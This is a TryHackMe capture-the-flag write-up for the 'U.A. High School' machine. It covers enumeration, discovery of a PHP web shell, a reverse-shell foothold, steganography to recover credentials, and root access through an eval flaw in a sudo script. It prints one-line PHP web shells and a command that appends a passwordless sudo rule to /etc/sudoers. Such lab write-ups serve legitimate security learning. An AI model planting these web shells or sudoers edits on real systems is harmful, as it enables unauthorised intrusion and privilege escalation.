THM-U.A. High School-Writeup
Welcome to the web application of U.A., the Superhero Academy.
Motivation
I randomly thought to do THM on weekend friday and saw a new machine was released few hours ago and that too with name U.A High. As an anime lover I had to do this machine right :) so I started the machine configured vpn and started.
Enumeration
Enumeration is the key!!
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 58:2f:ec:23:ba:a9:fe:81:8a:8e:2d:d8:91:21:d2:76 (RSA)
| 256 9d:f2:63:fd:7c:f3:24:62:47:8a:fb:08:b2:29:e2:b4 (ECDSA)
|_ 256 62:d8:f8:c9:60:0f:70:1f:6e:11:ab:a0:33:79:b5:5d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: U.A. High School
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelpretty much standard ports.
Fuzzing
I found an assets directory and has preety much nothing extactly.
After futher fuzzing I end up finding a index.php which has nothing blank page so I thought initially to leave it.
so after fuzzing everything with every wordlist from seclists I thought I might have missed something and came back to index.php which was complete blank white page.
so I noticed that it cloud be a webshell which is most common phenomena and generally has something line of code like below.
<?php echo passthru($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>so I quickly tried executing the cmd as web shell and boom!!
the response was encoded and if you have been playing ctf you might know that if there is == at the end its base64 most of the time. so now I had a command execution now.
FootHold
Now its time for reverse shell right. I generally use revshells.com by 0day because it the quickest way right :) (no need to remember code)
now I have a foothold.
I did some extra stuff to make thing stable and better up to you.
Privilege Escalation
As of now I was only www user. so I started searching for the directories and explore files. I cloud have used linpeas.sh but since it was easy machine so I thought to do manually.
I found a jpg and download that file. The file was corrupted first so had to fix it with hexedit or any tool.
I used tool https://github.com/Haxrein/MagicBytes which actually preety cool tool to fix corruped jpg file. you can manually do too with hexedit. check https://en.wikipedia.org/wiki/List_of_file_signatures .
after fixing jpg I got this cool deku image
It cloudn’t be thats only right. So I used steghide to see some hidden file within the jpg. But it reqired password to extract.
after enumerating more on each directory endup getting a passphrase.txt file which actually contained a base64 encoded password. I guess I cloud have easily got this if I had used linpeas.sh.
Used the password to extract the hidden txt file which was the credential of deku user.
Since I had now credential I ssh into deku user.
Local Privilege Escalation
The first step was to check sudo -l right cause why not since we have the credential of deku user.
I found /path/feedback.sh which deku user can run as root.
when I read the feedback.sh file it was entirely vulnerable and quickly found a way to figure it out for escalation.
If you see eval function it actually able to execute command on linux to basically I could write as root.
Since I can write any file as root by exploiting feedback , the quickest possible way is to add our current user deku on sudoers file which mean deku can be a member of sudo user and can has all right same as root user.
Command: deku ALL=NOPASSWD: ALL >> /etc/sudoers
Now when I did sudo -l you can see I have all root privilege so I cloud do anything as root. But for POC I had to cat root/root.txt
Now I can just do sudo su to switch to su user or root user in this case and grab a root flag.
Support My Writeup
